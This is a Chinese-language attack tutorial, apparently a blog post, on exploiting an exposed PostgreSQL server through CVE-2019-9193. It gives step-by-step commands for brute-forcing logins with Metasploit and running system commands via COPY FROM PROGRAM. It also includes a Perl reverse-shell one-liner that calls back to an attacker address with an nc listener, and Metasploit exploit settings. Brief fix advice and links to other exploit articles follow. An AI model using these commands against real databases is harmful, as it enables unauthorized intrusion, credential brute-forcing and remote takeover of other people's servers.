PostgresSQL未授权导致命令执行

简介: PostgresSQL未授权导致命令执行

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。
当该服务配置不当开放到外网时可以被暴破密码,获得任意用户密码登录成功后使用(CVE-2019-9193)高权限命令执行即可反弹管理员shell
实战

1.使用nmap或者fofa发现该端口或者相关服务
图片

2.使用kali系统中msf渗透模型进行暴破用户密码。
msfconsole //进入msf工具
use auxiliary/scanner/postgres/postgres_login //进入暴破模块
set rhosts 1.1.1.1 //添加目标ip
set rport 5432 //添加目标端口
set user_file /home/taibai/1 //后面的路径是用户名字典
set pass_file /home/taibai/2 //后面的路径是密码字典
show options //查看相关配置信息
run //开始运行
image.png

破解成功后会有提示破解的用户密码
image.png

3.使用破解后的用户名密码登录

psql -h 1.1.1.1 -U postgres -W //连接后提示输入密码
image.png

4.使用(CVE-2019-9193)高权限命令执行漏洞执行命令
DROP TABLE IF EXISTS cmd_exec; //删除你想用来保存命令输出但是可能存在的表
CREATE TABLE cmd_exec(cmd_output text); //创建你用来保存命令输出的表
COPY cmd_exec FROM PROGRAM 'id'; //通过 “COPY FROM PROGRAM”执行系统命令
SELECT * FROM cmd_exec; //查看执行结果
image.png

image.png

image.png

5.使用nc反弹shell(注意需要公网ip地址)

//攻击机上执行
nc -vv -l -p 1234

//perl命令来反弹shell
COPY files FROM PROGRAM 'perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"2.2.2.2:1234\");STDIN->fdopen($c,r);$~->fdopen($c,w);system $_ while <>;"';
6.如果上面不行可以直接使用msf中利用模块(注意需要公网ip地址)
set rhosts 1.1.1.1  //配置目标ip
set rport 5432   //配置目标端口
set username postgres  //配置目标用户名
set password 123456   //配置目标密码
set lhost 2.2.2.2   //配置反弹ip
set lport 1234   //配置反弹端口
show options  //查看配置
exp  //运行

图片

7.修复建议

升级最新稳定版本

配置端口白名单不要开放到外网

配置强密码

相关文章
|
NoSQL 安全 MongoDB
MongoDB 未授权访问漏洞利用
MongoDB 未授权访问漏洞利用
2977 0
|
6月前
|
人工智能 自然语言处理 前端开发
智能体决策机制深度剖析:ReAct、Plan-and-Execute与自适应策略
作为一名深耕人工智能领域多年的技术研究者,我深深感受到智能体(Agent)技术正在成为AI发展的关键转折点。从早期基于规则的专家系统,到如今融合大语言模型的智能代理,我们见证了决策机制从简单条件判断向复杂推理规划的演进历程。 在我的研究实践中,智能体决策机制的核心挑战始终围绕着如何在动态环境中做出最优决策。传统的决策树和状态机虽然逻辑清晰,但面对复杂多变的现实场景时显得力不从心。而随着GPT-4、Claude等大语言模型的兴起,我们迎来了前所未有的机遇——通过自然语言推理和规划,智能体可以展现出接近人类水平的决策能力。 当前主流的决策框架中,ReAct(Reasoning and Acting
1573 1
智能体决策机制深度剖析:ReAct、Plan-and-Execute与自适应策略
|
网络协议 安全 网络安全
DNS放大攻击
【8月更文挑战第20天】
1034 1
|
Web App开发 安全 Python
Chrome RCE 漏洞复现
Google Chrome是由Google开发的免费网页浏览器,大量采用Chrome内核的浏览器同样也会受此漏洞影响。攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行。 由于Chrome浏览器会默认开启沙盒,可以拦截利用该漏洞发起的攻击,所以一般用户不会受到影响。
778 10
Chrome RCE 漏洞复现
|
Shell PHP
escapeshellarg() 函数
escapeshellarg() 函数
237 5
|
Kubernetes 安全 Cloud Native
云上攻防-云原生篇&K8s安全-Kubelet未授权访问、API Server未授权访问
本文介绍了云原生环境下Kubernetes集群的安全问题及攻击方法。首先概述了云环境下的新型攻击路径,如通过虚拟机攻击云管理平台、容器逃逸控制宿主机等。接着详细解释了Kubernetes集群架构,并列举了常见组件的默认端口及其安全隐患。文章通过具体案例演示了API Server 8080和6443端口未授权访问的攻击过程,以及Kubelet 10250端口未授权访问的利用方法,展示了如何通过这些漏洞实现权限提升和横向渗透。
1429 0
云上攻防-云原生篇&K8s安全-Kubelet未授权访问、API Server未授权访问
|
11月前
|
人工智能 安全 数据库
AiCodeAudit-基于Ai大模型的自动代码审计工具
本文介绍了基于OpenAI大模型的自动化代码安全审计工具AiCodeAudit,通过图结构构建项目依赖关系,提高代码审计准确性。文章涵盖概要、整体架构流程、技术名词解释及效果演示,详细说明了工具的工作原理和使用方法。未来,AI大模型有望成为代码审计的重要工具,助力软件安全。项目地址:[GitHub](https://github.com/xy200303/AiCodeAudit)。
4320 9
|
Web App开发 移动开发 安全
WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
2701 1
|
存储 SpringCloudAlibaba 安全
Nacos未授权访问复现及修复
Nacos未授权访问复现及修复
3149 1
|
存储 安全 Apache
文件上传--Upload-labs--Pass03--特殊后缀与::$DATA绕过
文件上传--Upload-labs--Pass03--特殊后缀与::$DATA绕过
文件上传--Upload-labs--Pass03--特殊后缀与::$DATA绕过